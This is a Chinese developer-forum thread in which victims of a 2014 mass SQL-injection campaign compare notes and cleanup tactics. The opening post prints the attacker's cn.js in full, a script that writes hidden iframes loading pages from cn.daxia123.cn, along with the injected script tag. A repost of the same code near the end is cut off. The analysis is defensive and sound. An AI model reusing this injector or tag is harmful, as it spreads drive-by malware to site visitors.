日期:2014-05-18  浏览次数:20620 次

中招的朋友们,进来一起[举报恶意网站] cn.daxia123.cn|cn.jxmmtv.com
最近网站经常被这样挂马

修改用户数据库挂马,google搜索有2000多网站中招

我的也中招了,我分析了一下。
以下是cn.js的代码
window.status="";

var cookieString = document.cookie;
var start = cookieString.indexOf("cnfuck=");
if (start != -1)
{
}
else
{
var expires = new Date();
expires.setTime(expires.getTime()+1*3600*1000);
document.cookie = "cnfuck=update;expires="+expires.toGMTString();
document.write("<iframe src=http://cn.daxia123.cn/cn.htm width=200 height=0></iframe>");
document.write("<iframe src=http://cn.daxia123.cn/s.htm width=200 height=0></iframe>");
}

而上述引用到的cn.htm的代码是:
<script src="http://s39.cnzz.com/stat.php?id=1184740&web_id=1184740"
language="JavaScript" charset="gb2312"></script>
可以看出是为了向中国站长网刷IP的。如果有中国站长网的人,请明确一下上述代码的作用,
根据id=1184740&web_id=1184740找出真凶。
而上述引用到的s.htm的代码是一些乱码,我发在附件,高手帮分析一下。

请解决问题的朋友来帮帮忙吧~

猜测会不会是通过sql注入式攻击,但我们的代码已经进行防水处理了,不知道是从哪儿攻击网站的



------解决方案--------------------
hen taoyan de ma
------解决方案--------------------
你看看你的数据库里面有没有<script>类型这样的东西,如果有那就是被注入了
------解决方案--------------------
郁闷啊, 我网站也被中标了。怎么办。
------解决方案--------------------
我的也中招了,昨天把数据库还原了,今天早上发现有中马了,还是<script src=http://cn.daxia123.cn/cn.js></script>,刚把昨天的数据库 中的<script src=http://cn.daxia123.cn/cn.js></script>这段代码都给清除掉了,幸好数据量不是很大,又还原数据库了,现在中马的原因还没查处了啊,郁闷哪。。。
------解决方案--------------------
日。自己写的代码最基本的要防SQL注入啊
------解决方案--------------------
这几天也不知咋搞的.我的站上面也有啊.清理也不管.钢清理完又有了.
------解决方案--------------------
建议大家人肉搜索一下那家伙.
------解决方案--------------------
地址是访问量统计,人家用来统计中招的的网站浏览量。

是服务器中毒而已,根本不是sql注入。
------解决方案--------------------
哦.看来还挻复杂的吗.
------解决方案--------------------
我也中了这个大侠123的木马,我使用了一个暂时解决的办法,对vachar或nvachar字段长度做了限制,找出该字段最长的字段长度N,然后将该字段的最大长度设为N,发现效果还可以,至少已经有2天没有被注入了,其他如ntext或text字段的就做了一个触发器的限制,不允许插入script。

如果按13楼所说是2进制注入的话,我觉得可以通过判断post值的长度来临时解决,毕竟正常情况下不会传一个这么长的值吧
------解决方案--------------------
顶,关注了
------解决方案--------------------
最近网站经常被这样挂马 

修改用户数据库挂马,google搜索有2000多

网站中招 

我的也中招了,我分析了一下。 
以下是cn.js的代码 
window.status=""; 

var cookieString = document.cookie; 
var start = cookieString.indexOf

("cnfuck="); 
if (start != -1) 


else 

var expires = new Date(); 
expires.setTime(expires.getTime()

+1*3600*1000); 
document.cookie = 

"cnfuck=update;expires="+expires.toGMT

String(); 
document.write(" <iframe 

src=http://cn.daxia123.cn/cn.htm 

width=200 height=0> </iframe>"); 
document.write(" <iframe 

src=http://cn.daxia123.cn/s.htm 

width=200 height=0> </iframe>"); 


而上述引用到的cn.htm的代码是: